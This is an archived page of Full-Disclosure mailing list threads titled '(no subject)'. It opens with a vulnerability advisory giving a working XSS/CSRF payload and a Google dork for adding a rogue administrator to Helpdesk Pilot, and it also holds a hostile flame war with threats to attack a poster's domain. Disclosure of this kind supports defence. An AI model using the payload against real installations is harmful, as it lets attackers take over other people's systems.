[Full-disclosure] (no subject)

2013-12-02 Thread Ciaran McNally
###

 Ciaran McNally

Application: Helpdesk Pilot
 http://www.helpdeskpilot.com/
Versions:All versions.
Platforms:   Windows, Mac, Linux
Bug: XSS/CSRF Add Administrator
Exploitation:WEB
Date:30 November 2013.
Author:  Ciaran McNally
Web: http://makthepla.net/blog/=/helpdesk-pilot-add-admin
My Twitter: https://twitter.com/ciaranmak
Google Dork: intext:"powered by Helpdesk Pilot"

###

1) Bug.
2) The exploit.
3) Fix.

###
Help desk software or your business...
###

==
1) Bug
==
If attacker can submit a ticket, he/she simply needs to include a malicious
Url within the the ticket.

Javascript injection then occurs via the Url that is incorrectly sanitized.

http://example.com/prompt(1);



###

===
2) The "exploit"
===

For a simple Proof of concept use the example above, you will see the
expected popup within the ticketing system once it's viewed.

To add an administrator use a malicious Url similar to the following...
(Make sure there are no spaces otherwise it won't be parsed correctly)

http://makthepla.net/
$(document).ready(function(){$.ajax({type:"POST",url:"http://
[HOST]/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=[ATTACKER_MAIL]&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});

where [HOST] is the location of the software
and [ATTACKER_MAIL] is the attacker's email.

Attacker will recieve a mail if it successfully executes to complete
admin addition.

The example above contains alerts simply for POC, this is the one used
in the video on my blog post.



###

==
3) Fix
==

Was Reported to the vendors twice,

Fix in progress...

###

--
maK :)

-- 
---
*-maK-*
Redbrick Administrator 2013/2014
Redbrick Webmaster 2012/2013
Redbrick Events Officer 2011/2012
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2012-11-15 Thread Julius Kivimäki
Am I the only one who noticed the linux local root exploit written in
whitespace?

2012/11/15 mohit tyagi 

>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2012-11-15 Thread James Condron
I would be interested to see a real world application of OP's
informative point though I do think vendor response is needed too.

Has anybody come across this in the wild?

On Thu, Nov 15, 2012 at 2:01 PM, Sanguinarious Rose
 wrote:
> I found this to be of high informational value, I do agree completely
> with the statement thus given.
>
> Please, tell us more about how to came to these conclusions, how this
> impacts this community, and the social dynamics of our society as a
> whole.
>
> Best Regards
>
> On Thu, Nov 15, 2012 at 7:02 AM, mohit tyagi  
> wrote:
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2012-11-15 Thread Sanguinarious Rose
I found this to be of high informational value, I do agree completely
with the statement thus given.

Please, tell us more about how to came to these conclusions, how this
impacts this community, and the social dynamics of our society as a
whole.

Best Regards

On Thu, Nov 15, 2012 at 7:02 AM, mohit tyagi  wrote:
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2012-11-15 Thread Gary Baribault
Now that was mean :-) Funny .. but mean LOL

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

On 11/15/2012 08:42 AM, Peter Osterberg wrote:
> In most case there are keyboards attached to computers, they provide
> an excellent opportunity for providing content to your mails.
>
> On 2012-11-15 13:02, mohit tyagi wrote:
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2012-11-15 Thread Peter Osterberg
In most case there are keyboards attached to computers, they provide an
excellent opportunity for providing content to your mails.

On 2012-11-15 13:02, mohit tyagi wrote:
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2012-04-25 Thread coderman

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2012-04-25 Thread Ramon Driessen

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2011-08-11 Thread steven seeley
http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2011-06-12 Thread adam
Baseless assumption is baseless. While you're breaking stuff in your
mother's basement, I'm making a living. I've *opted* to reply to these
emails because it's free amusement.

Why are you so upset anyway? The world isn't going to end just because you
thought a feature was a bug.

On Sun, Jun 12, 2011 at 12:41 AM, -= Glowing Doom =- wrote:

> your a deeadset fool... whats worse, you cannot even find the actual bug i
> am speaking of... and, you have wasted ALL day ojn this.. then ppl wonder
> why fd lists is nowdays a joke, indeedm, with idiots like you around.
> go back to your bridge fool. your going down, HARD.
>
>
>
> On 12 June 2011 15:38, adam  wrote:
>
>> LOL, it contains [rendered] HTML code but you're telling us that it's
>> plain-text?
>>
>> In case you missed it, here are *your* email headers:
>>
>>
>> Content-Type: text/html; charset=ISO-8859-1
>> Content-Transfer-Encoding: quoted-printable
>>
>>
>> On Sun, Jun 12, 2011 at 12:32 AM, -= Glowing Doom =- wrote:
>>
>>> yea... watch and learn fool.. your nothing but a troll..like others have
>>> shown, all you  know is about the what, hilight+link, after it being raised
>>> as an issue... wich, would never show the links i was able to put, in PLAIN
>>> text in yo9ur mail.. explain how i did that  then smartie ? It was plain
>>> text in between two links HINT HINT... your anchor bs , is BUGGY!]
>>> Dont try to act all high and mighty now, it took 25 emails for you to
>>> even work out thwe word anchor...fool.
>>> now enjoy port 25 on your domain it should work great,,... you just
>>> got yourself owned idiot.
>>> bye bye...adam.
>>>
>>> Show them the real shit, dont sho them JUST rage, show the BUG go
>>> on... have some balls , and then, explain why the link, is there, hidden
>>> under PLAIN TEXT!
>>>
>>> It is no exploit ATM , it is a simple PoC, of a bug.
>>> Issue or no issue..you could not work ut what itwas, until i made demos
>>> of it, and the last demo, is NOT anchor.. go on and sow the carriage return
>>> on it.. idiot.
>>>
>>>
>>>
>>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2011-06-12 Thread adam
You got me, my session ID *is 1234567. *Please don't steal money out of my
bank account.

The only part that I'll bother replying to is what a *joke this list is*.
It's so much of a joke that you not only subscribed once, but TWICE.

That speaks volumes about you :D

On Sun, Jun 12, 2011 at 12:52 AM, -= Glowing Doom =- wrote:

> Oh it only took yu, what, 8hours to explain 'anchor' t someone who already
> knows what that is.. i showed something much different, explain the links..
> dont show ppl bllshit.. what a damn joke, YOU are a joke, i cannot believe
> your on FD lists, you are what makes it a joke, im laughing AT you because,
> you still have NOT FOUND crap, yet admits to it being used in
> unconventional' way... g and write some bs to fd more.. i aint replying..
> ppllcan look themselfs if they like, you are only seeing one small piece of
> a MUCh bigger pic..and, ontop, it tok you only a day,. and defaming someone,
> who was raising an issue.. your why people hate fd.
> go fk yourself adam .
> your a tool , and soon, your nulled.dont blame me when your nulled btw...
> there are others who CAN see the bug... like say, spammers..
> you are doing a great ob of that tho, without undrerstanding the bug
> atall... you said it, unconbventional..now,. so ahead and explain how i mak
> it show http://googl_1234567/ , ie: your sessid :)
> you cant, so you sit here trolling.
> now, thats enough for me. what a joke this list has become. seriously, your
> pathetic.
> your the only one whos talking, so i assume, your the only one who cannot
> see the further picture...good :)
> have fun with it. when you show me the x41's , then ill start to take you
> seriously.
> enjoy the exploit :)
> bacvkspace - backspace...and then...swhat... no link entered... gf ahead,
> explain... you say this is normal...sorry, i havent seen it till today
> online anywhere... until it showed up on MS about backspace issues... you do
> not understand carriage line return it seems, so resort to dfaming , and ,
> what a life you have, allday and your STILL going.. i will now stfu... i
> know when to stop, i have prooven what i had to you hav eprooven, your
> an idiot.
> and a troll, and a shame your on fdlists.
> you m,ust lead a damn sad life...  really.. you must.
> bye bye... and, dont blame me when your papsy goes down for the countm,
> some ppl understand CLR , others dont, i guess thats just intellect tho.
> Whos talking adam >??? you.
> no one else BUT you.
> and still canntn explain how i put your session id, in the link, or my
> sessid for that matter..and your claiming thats 'normal'''pathetic
> man..really .
> bnow, please stop it, or ill start to fuck with your domainso bad, you will
> not exist online, on any fd, by morning.
> ok :)
> have fun trying to STILL fgure the PRPER bug, NOT anchring.
> You know your a troll tho.. what a boring fuck life you must lead...man...
> you wasted a dday fighting about a pissy issue,. wich you have admitted , is
> not 'conventional' well, sorry but, i had not seen this before, not in
> LEGITIMATE emails.. not the backspace tricks, wich you still cannot explain,
> keep harping abiout anchor, your about 1005 off.
> later, dont bother me, i will just flter you, and all of fd.. simple. you
> going to tell me i cant ? watch me.
>
>
>
> On 12 June 2011 15:41, -= Glowing Doom =-  wrote:
>
>> your a deeadset fool... whats worse, you cannot even find the actual bug i
>> am speaking of... and, you have wasted ALL day ojn this.. then ppl wonder
>> why fd lists is nowdays a joke, indeedm, with idiots like you around.
>> go back to your bridge fool. your going down, HARD.
>>
>>
>>
>> On 12 June 2011 15:38, adam  wrote:
>>
>>> LOL, it contains [rendered] HTML code but you're telling us that it's
>>> plain-text?
>>>
>>> In case you missed it, here are *your* email headers:
>>>
>>>
>>> Content-Type: text/html; charset=ISO-8859-1
>>> Content-Transfer-Encoding: quoted-printable
>>>
>>>
>>> On Sun, Jun 12, 2011 at 12:32 AM, -= Glowing Doom =- 
>>> wrote:
>>>
 yea... watch and learn fool.. your nothing but a troll..like others have
 shown, all you  know is about the what, hilight+link, after it being raised
 as an issue... wich, would never show the links i was able to put, in PLAIN
 text in yo9ur mail.. explain how i did that  then smartie ? It was plain
 text in between two links HINT HINT... your anchor bs , is BUGGY!]
 Dont try to act all high and mighty now, it took 25 emails for you to
 even work out thwe word anchor...fool.
 now enjoy port 25 on your domain it should work great,,... you just
 got yourself owned idiot.
 bye bye...adam.

 Show them the real shit, dont sho them JUST rage, show the BUG go
 on... have some balls , and then, explain why the link, is there, hidden
 under PLAIN TEXT!

 It is no exploit ATM , it is a simple PoC, of a bug.
 Issue or no issue..you could not work ut what itwas, until i made demos
 

Re: [Full-disclosure] (no subject)

2011-06-12 Thread adam
It's really kinda sad that you're *still* going. There are thousands of *
features* in all kinds of software that *can* be exploited, but that doesn't
mean the feature itself was completely unintentional. You were originally
describing anchor text and now you're simply describing multi-line anchor
text. There is nothing fancy or innovative here, it's a basic feature being
used in an *unconventional* way (and I use that term loosely).

*How* you're going about it may be interesting to you or a handful of others
- but the end result is possible using an *existing feature [that's present
in most mail clients]*.

I do find it amusing that you keep making threats though. I *hope* that my
server does go offline, since you've given me more than enough evidence to
have a field day with this. Most people wouldn't bother, but I work from
home, so I have all the time in the world to pursue this and have you
forcefully drug out of your mother's basement.

On Sun, Jun 12, 2011 at 12:25 AM, -= Glowing Doom =- wrote:

> Yea yea... this is not about anchor text... if you want more demonstations,
> of a REAL exploit.. bad luck.. ive already shown adam how this 'anchor'
> text, is buggy... but, he would not show those links i guess... wich come
> from session ID... anchor anchr...whatever... have fun on fd... you loose,
> not me.. cc me, ill just keep your lame papsy.net nulled then... simple,
> and complain to gmail for attaching pam, then filter you :)
>
> Your an idiot.
>
> You could not work the thing out, then your all about anchor, when ive said
> the problem is a backspace... there was 2 pcs.. i raised an issuie... one of
> 2 ... and, you cannot try telling me this is a 'feature' , go ahead and show
> me where this is used, LEGALLY and, why... i dont see it until i raised this
> issue today.
> go fk yourselfs.
> fd my arse. now is hack fd.
> bye bye.
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2011-06-12 Thread adam
LOL, it contains [rendered] HTML code but you're telling us that it's
plain-text?

In case you missed it, here are *your* email headers:


Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable


On Sun, Jun 12, 2011 at 12:32 AM, -= Glowing Doom =- wrote:

> yea... watch and learn fool.. your nothing but a troll..like others have
> shown, all you  know is about the what, hilight+link, after it being raised
> as an issue... wich, would never show the links i was able to put, in PLAIN
> text in yo9ur mail.. explain how i did that  then smartie ? It was plain
> text in between two links HINT HINT... your anchor bs , is BUGGY!]
> Dont try to act all high and mighty now, it took 25 emails for you to even
> work out thwe word anchor...fool.
> now enjoy port 25 on your domain it should work great,,... you just got
> yourself owned idiot.
> bye bye...adam.
>
> Show them the real shit, dont sho them JUST rage, show the BUG go on...
> have some balls , and then, explain why the link, is there, hidden under
> PLAIN TEXT!
>
> It is no exploit ATM , it is a simple PoC, of a bug.
> Issue or no issue..you could not work ut what itwas, until i made demos of
> it, and the last demo, is NOT anchor.. go on and sow the carriage return on
> it.. idiot.
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2011-06-09 Thread Zach C.
To borrow a mechanism from 'chan' boards...

> not telling how everything works
> expecting me to trust it blindly
> false positives extremely possible
> arrogant affirmation of probably inflated success rate and development
periods
> anonymity-hostile

Lol wat
On Jun 9, 2011 6:21 PM,  wrote:
>> On Fri, 10 Jun 2011 02:40:16 +0300, n...@myproxylists.com said:
>>
>>> Im happy to hear it works out to you. A few days ago, i received an
>>> email
>>> from https://www.proxpn.com/ admin that he suspended fraudulent user VPN
>>> account due to the abuse. A fraudster used a stolen credit card using
>>> their VPN to purchase a service from us. Needless to say, their CIDR's
>>> has
>>> been also added to this list.
>>
>> You're incredibly lucky it was proxpn.com and not comcast.com. ;)
>>
> I sense sarcasm. Im exacly aware of comcast and almost all other U.S cable
> providers residental address ranges. Did you happend to know that comcast
> do also provide static IP's for companies, dedicated hosting.
>
> Im also fully aware of botnet proxies that are spreaded wide to comcast
> ranges, not only to comcast, to a majority of U.S cable providers. We have
> a method to detect some of those botnet proxies but I wont go in to
> details for obvious reasons.
>
> Once again, almost none of you did not bothered to read features. You have
> the option to CHOOSE will you block hosting providers or not. It does not
> block anything by default.
>
> This is my last reply to this topic.
>
> Simply, it does provide protection to those who wants it and everyone can
> configure their API in the way they want. None is not enforced to block
> anything. Period.
>
> Atleast I managed to open discussion. Something else than daily boring
> XSS/CRLF bugs.
>
> Thanks to everyone for the feedback and interests, whether it was positive
> or negative.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2011-06-09 Thread nix
> On Fri, 10 Jun 2011 02:40:16 +0300, n...@myproxylists.com said:
>
>> Im happy to hear it works out to you. A few days ago, i received an
>> email
>> from https://www.proxpn.com/ admin that he suspended fraudulent user VPN
>> account due to the abuse. A fraudster used a stolen credit card using
>> their VPN to purchase a service from us. Needless to say, their CIDR's
>> has
>> been also added to this list.
>
> You're incredibly lucky it was proxpn.com and not comcast.com. ;)
>
I sense sarcasm. Im exacly aware of comcast and almost all other U.S cable
providers residental address ranges. Did you happend to know that comcast
do also provide static IP's for companies, dedicated hosting.

Im also fully aware of botnet proxies that are spreaded wide to comcast
ranges, not only to comcast, to a majority of U.S cable providers. We have
a method to detect some of those botnet proxies but I wont go in to
details for obvious reasons.

Once again, almost none of you did not bothered to read features. You have
the option to CHOOSE will you block hosting providers or not. It does not
block anything by default.

This is my last reply to this topic.

Simply, it does provide protection to those who wants it and everyone can
configure their API in the way they want. None is not enforced to block
anything. Period.

Atleast I managed to open discussion. Something else than daily boring
XSS/CRLF bugs.

Thanks to everyone for the feedback and interests, whether it was positive
or negative.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2011-06-09 Thread Valdis . Kletnieks
On Fri, 10 Jun 2011 02:40:16 +0300, n...@myproxylists.com said:

> Im happy to hear it works out to you. A few days ago, i received an email
> from https://www.proxpn.com/ admin that he suspended fraudulent user VPN
> account due to the abuse. A fraudster used a stolen credit card using
> their VPN to purchase a service from us. Needless to say, their CIDR's has
> been also added to this list.

You're incredibly lucky it was proxpn.com and not comcast.com. ;)


pgplP12IVMUEK.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2011-06-09 Thread nix
> HELo tor.hu
> MAIL FROM:
> RCPT TO:
> DATA
> From: "TOR" 
> To: "Full Disclosure" 
> Subject: Re: [Full-disclosure] NiX API
>
>
>> However though, any merchant that accepts purchases from user's behind
>> proxies
>> or other anonymizer's is taking a siginificant risk.
>
>
> You don't just block anonymizers: you block webhosting providers, server
> hostings, hosts based on proxy HTTP headers, TOR, etc.
> According to the stats on your control panel (number of subnets vs number
> of IP's) you seem to prefer to just put the whole /24 on block when you
> notice a new 'suspicious' IP.
> In the end, I think you are blocking a lot more potential customers than
> fraudsters.
> By the way, we do something similar here (we have an extensive list of
> throwaway mail providers, we collect proxies, etc), only we use these
> lists to block people from getting free VPN access through proxies, not
> customers who are willing to pay. Doing the latter would reduce our
> revenue by at least 50%.

I investigated all transactions that paypal reversed due to the
chargebacks or unauthorized account use. Guess what?

A majority of those IP's originated from the blocked hosting provider
IP-address ranges or from open proxies that our system could not detect at
that time (for example botnet proxies are bitch to detect due to various
reasons). Im not saying our system is 100% and unbreachable but I do know
it does give you reasonable protection to address this issue.

We're verifying very carefully those hosting providers ranges before we
add any to the blacklist. I don't go in to details on how we do it but I
can assure you we have very effective way to detect who is a hosting
provider or not. Needless to say, this is very hard work.

Why we're blocking hosting providers? Lets mention two big names, godaddy
and softlayer. Have you ever heard about a web-proxy? All these thousands
of daily freely accessible web proxies by whole world are hosted of course
in hosting providers datacenters for obvious reasons. They attract a lot
of legit users and also abusers. We can also add those hundreds or
thousands of hacked dedicated servers as well to this list that are being
used for scraping, hacking attempts, brute forcing and so on.

** You've the option to choose will you block those hosting providers or
not. ** It does not block anything automatilly unless you configure it to
block something. We leave this decision to you what to block or allow.

Im happy to hear you're using similar technology. You've just said
yourself why you do want to block proxy users.

>
>
>> Guess what will happend to that merchant? They are frustrated while
>> answering unauthorized paypal claims. If this purchase was done using a
>> stolen credit card, PayPal will charge this merchant for outrageous fees
>
>
> I agree that Paypal's charges are outrageous (for example, 3 EUR purchase
> -> 30 EUR fees for the chargeback, regardless of whether we accepted or
> disputed it).
> For us, what helped the situation in the end was focusing on user data
> consistency, immediately refunding suspicious purchases from China and so
> on, not the IP's.
> We've gotten chargebacks from regular ppp pools in China and have many
> satisfied returning customers who are using proxies or just some network
> that is natted behind a server in a server hosting.
> It doesn't mean they are trying to be anonymous, it just means their
> network works like that. For example, it is typical for a wi-fi provider
> to NAT users on their server in a server hosting (that you probably block
> as a /24 subnet), but they're still potential customers of any online
> shop, not just our VPN.
>
>
>> wondered why they could not login using the proxy, I said, remove the
>> proxy and try again and then do purchase. They did.
>
>
> Some people might be more patient and write emails about how they cannot
> make a purchase, but most will just find another place.

This is true indeed. But if you would have 50 fraudulent purchases in a
short period. What would you do? You sell TV's. Someone will order a $2500
nice new TV from your online shop. OK, you go and check this client IP,
it's a proxy or Tor exit node. Will you deliver this TV instantly to this
customer? I don't think so. If you accept PayPal. Paypal will charge you a
4% reversal fee from that 2.5k which is $100 bucks is the payment happened
to be fraudulent. So you've just lost 2,6k.

At this point you start thinking will you stop using PayPal and if you do
so, prepare to lose even more renevue because they are the most popular
payment gateway. OK, you've stopped using PayPal and another gateway.
You'll still have the same issue and risk. Of course those gateways have
some sort of security, but there are hundreds of daily proxies from public
lists that can bybass any payment gateway ...

How many times I have to say this?

>
>
>> "You're a legit user --> Why in earth you would like to use a proxy or
>> or anonymizer to do the purchase?"
>
> Torrents, ge

[Full-disclosure] (no subject)

2011-06-09 Thread fulldisc
HELo tor.hu
MAIL FROM:
RCPT TO:
DATA
From: "TOR" 
To: "Full Disclosure" 
Subject: Re: [Full-disclosure] NiX API


> However though, any merchant that accepts purchases from user's behind proxies
> or other anonymizer's is taking a siginificant risk.


You don't just block anonymizers: you block webhosting providers, server 
hostings, hosts based on proxy HTTP headers, TOR, etc.
According to the stats on your control panel (number of subnets vs number of 
IP's) you seem to prefer to just put the whole /24 on block when you notice a 
new 'suspicious' IP.
In the end, I think you are blocking a lot more potential customers than 
fraudsters.
By the way, we do something similar here (we have an extensive list of 
throwaway mail providers, we collect proxies, etc), only we use these lists to 
block people from getting free VPN access through proxies, not customers who 
are willing to pay. Doing the latter would reduce our revenue by at least 50%.


> Guess what will happend to that merchant? They are frustrated while
> answering unauthorized paypal claims. If this purchase was done using a
> stolen credit card, PayPal will charge this merchant for outrageous fees


I agree that Paypal's charges are outrageous (for example, 3 EUR purchase -> 30 
EUR fees for the chargeback, regardless of whether we accepted or disputed it).
For us, what helped the situation in the end was focusing on user data 
consistency, immediately refunding suspicious purchases from China and so on, 
not the IP's.
We've gotten chargebacks from regular ppp pools in China and have many 
satisfied returning customers who are using proxies or just some network that 
is natted behind a server in a server hosting.
It doesn't mean they are trying to be anonymous, it just means their network 
works like that. For example, it is typical for a wi-fi provider to NAT users 
on their server in a server hosting (that you probably block as a /24 subnet), 
but they're still potential customers of any online shop, not just our VPN.


> wondered why they could not login using the proxy, I said, remove the
> proxy and try again and then do purchase. They did.


Some people might be more patient and write emails about how they cannot make a 
purchase, but most will just find another place.


> "You're a legit user --> Why in earth you would like to use a proxy or or 
> anonymizer to do the purchase?"

Torrents, general privacy, HTTP connection to my websites, etc. I use TorVPN 
24/7, make payments through Paypal and with my credit card as well from this IP 
without any problems.


https://torvpn.com/
http://torvpn.com/temporaryemail.html
http://torvpn.com/proxylist.html



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2011-05-17 Thread Jhfjjf Hfdsjj
http://www.lestes.net/wp-content/themes/default/life.html___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2011-02-08 Thread Alejandro C�novas Solbes

INVITATION:

=
Please consider to contribute to and/or forward to the appropriate groups the 
following opportunity to submit and publish original scientific results.
=

== IMMM 2011 | Call for Papers ===

CALL FOR PAPERS, TUTORIALS, PANELS

IMMM 2011: The First International Conference on Advances in Information Mining 
and Management
July 17-22, 2011 - Bournemouth, UK

General page: http://www.iaria.org/conferences2011/IMMM11.html
Call for Papers: http://www.iaria.org/conferences2011/CfPIMMM11.html

Submission deadline: March 1, 2011

Technical Co-Sponsors:
- The Bournemouth & Poole College
- Bournemouth University
- Cisco Systems, Inc.
- Linköpings Universitet, Sweden
- IN2 search interfaces development Ltd., UK
- High Performance Computing Center Stuttgart / Universität Stuttgart, Germany
Sponsored by IARIA, www.iaria.org

Extended versions of selected papers will be published in IARIA Journals: 
http://www.iariajournals.org

Please note the Poster Forum and Work in Progress options.

The topics suggested by the conference can be discussed in term of concepts, 
state of the art, research, standards, implementations, running experiments, 
applications, and industrial case studies. Authors are invited to submit 
complete unpublished papers, which are not under review in any other conference 
or journal in the following, but not limited to, topic areas.

All tracks are open to both research and industry contributions, in terms of 
Regular papers, Posters, Work in progress, Technical/marketing/business 
presentations, Demos, Tutorials, and Panels.

Before submission, please check and conform with the Editorial rules: 
http://www.iaria.org/editorialrules.html

IMMM 2011 Topics (topics and submission details: see CfP on the site)

Mining mechanisms and methods
Data mining algorithms; Media adaptive mining; Agent-based mining; 
Content-based mining; Context-aware mining; Automation of data extraction; Data 
mining at a large; Domain-driven data mining; Graph-based data mining; 
Multilabel information; Multimodal mining; Cloud-based mining; Mining using 
neurocomputing techniques

Mining support
Querying for mining; Questions for digital investigation; Similarity search; 
User-generated content; Visualizing data mining; Internationalization and 
localization techniques for profile/context-based visualization

Type of information mining
Concept mining; Process mining; Concept mining; Knowledge mining; Knowledge 
discovery; Mining image and video; Mining patterns; Opinion mining; Graph 
mining; Ontology mining; Semantic annotations and mining; Document mining; 
Spatial mining; Speech mining; Text mining; Web mining; XML data mining

Pervasive information retrieval
Context and location information retrieval; Mobile information retrieval; 
Geo-information retrieval; Context-aware information retrieval; Access-driven 
information retrieval; Location-specific information retrieval; Spacial 
information retrieval; Semantic-driven retrieval

Automated retrieval and mining
Automated information extraction; Agent-based data mining and information 
discovery; Agent-based knowledge; Datamining-based agents and multi-agent 
systems; Agent-mining intelligent applications and systems; Automated retrieval 
of multimedia streams; Automated retrieval from multimedia archives; Automated 
copyright infringement detection and watermarking; Automated content 
summarization; Automatic concept detection, categorization, and genre 
detection; Automatic speech recognition; Automated cross-media linking

Mining features
Multilingual data mining; Multimedia mining; String processing and data mining; 
Mining association rules; Mining social relationships; Mining linked data; 
Mining sequential episodes from time series; Mining time-dependent data; 
Un-supervised data mining; Semi-structured data; Mining location-sensitive 
data; Concept-drift in data mining

Information mining and management
Data cleaning; Data updating; Segmentation and clustering; Mining transient 
information; Warehousing; Web syndication; Data filtering and aggregation; 
Optimal pruning; Data summarization; Knowledge injection, discovery and 
classification; Uncertainty removal; Managing incompleteness

Mining from specific sources
Bio data mining; Climate data mining; Data mining in medicine and pharmacology; 
Data mining in special networks (grids, sensors, etc.); Data management for 
mobile systems; Data management for sensors; Data mining and management for 
wireless systems; Dynamic network discovery; Mining from multiple sources; 
Mining personal semantic data; Mining from social networks; Mining from deep 
web; Mining from Wikipedia

Data management in special environments
Data management in sensor and mobile ad hoc networks; Data management in mobile 
peer-to-peer networks; Data management for mobile applications; Data management 
in mobile/temporal social networks; Management of community 
sensing/par

Re: [Full-disclosure] (no subject)

2010-11-23 Thread coderman
2009/12/16 Dan Kaminsky :
> Easily the best environment for packet manipulation is scapy.
>
> The most guaranteed to work approach involves putting a system with two
> interfaces in as an attacker, ...

i love dual port gumstix and the old yoggie gatekeeper pro form factor
for this; both are now EOL and long past last fab run.

what is the new best form factor in production?  i'd love a hw crypto
accelerated T3 more than AES-NI or Padlock style mobile kit. does one
yet exist, or perhaps soon to be?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2010-02-16 Thread Christian Sciberras
There was a slight error in accuracy, try your math again and you'll
see that 42 doesn't make sense.
>:)






On Wed, Feb 17, 2010 at 6:24 AM, Tomas L. Byrnes  wrote:
> Sorry for the Inconvenience.
>
>
>
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>> disclosure-boun...@lists.grok.org.uk] On Behalf Of gold flake
>> Sent: Tuesday, February 16, 2010 9:16 PM
>> To: Christian Sciberras
>> Cc: 751 ...?; full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] (no subject)
>>
>> No it is still 42 and will always be
>>
>> On Mon, Feb 15, 2010 at 3:56 PM, Christian Sciberras
>>  wrote:
>> > That's old news!
>> >
>> > It's been upgraded to 239!
>> >
>> >
>> >
>> > On Mon, Feb 15, 2010 at 11:25 AM, Anders Klixbull 
>> wrote:
>> >>
>> >> you obviously misunderstood since every geek on the planet knows
>> that the
>> >> answer in numeric form is 42!
>> >>
>> >>
>> >> ____________
>> >> From: Christian Sciberras [mailto:uuf6...@gmail.com]
>> >> Sent: 15. februar 2010 11:15
>> >> To: Anders Klixbull
>> >> Cc: edgar deal; 751 ...?; full-disclosure@lists.grok.org.uk
>> >> Subject: Re: [Full-disclosure] (no subject)
>> >>
>> >> Actually, the correct answer is 239.
>> >> The full question to the answer (and sum) is left up to the read.
>> >>
>> >> On Mon, Feb 15, 2010 at 11:07 AM, Anders Klixbull 
>> wrote:
>> >>>
>> >>> yes the correct answer is 'cheese'
>> >>>
>> >>>
